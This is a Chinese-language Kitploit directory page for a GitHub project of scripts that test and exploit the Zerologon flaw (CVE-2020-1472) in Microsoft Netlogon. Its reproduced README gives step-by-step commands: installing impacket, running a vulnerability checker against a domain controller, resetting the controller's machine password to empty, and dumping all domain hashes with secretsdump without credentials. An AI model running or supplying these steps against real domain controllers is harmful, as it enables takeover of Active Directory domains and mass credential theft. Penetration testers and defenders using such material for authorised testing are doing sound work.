Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/carlos55ml/zerologon
权限提升密码攻击漏洞分析漏洞利用横向移动渗透测试
GitHubcarlos55ml/zerologon

zerologon

一组脚本,用于测试和利用zerologon漏洞(CVE-2020-1472)。

查看仓库
24年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Zerologon

一组用于测试和利用 zerologon 漏洞 (CVE-2020-1472) 的脚本。


banner

这是什么?

ZeroLogon 是一个漏洞,允许我们利用 Microsoft Active Directory Netlogon 远程协议 (MS-NRPC) 中的加密缺陷,该协议允许用户使用 NTLM 登录服务器。


前期准备

在执行漏洞利用之前,我们必须知道我们需要一个不同版本的 impacket,为此我们将执行以下操作。

apt remove --purge impacket-scripts python3-impacket

git clone https://github.com/SecureAuthCorp/impacket.git

cd impacket

pip install .


PoC(概念验证)

git clone https://github.com/Nekoox/zerologon.git

cd zerologon

pip install -r requirements.txt

检查目标域控制器是否存在 zerologon 漏洞。

python3 tester.py <DC-NAME> <ip-address>

如果目标域控制器存在漏洞,将会显示一条消息:"成功!域控制器可以被 Zerologon 攻击完全攻陷。"

否则,即目标域控制器没有漏洞(因为安全漏洞已被修补),我们将收到以下消息:"攻击失败。目标可能已修补。"


将存在漏洞的域控制器的密码更改为空字符串。

python3 empty_pw.py <DC-NAME> <ip-address>

如果域控制器存在漏洞,运行漏洞利用程序后,它应该没有密码。

转存域控制器的哈希值。

> secretsdump.py -just-dc <DC-NAME>\$@<ip-address>

执行此命令后,我们就能看到域的所有哈希值,无需任何凭证。

下载工具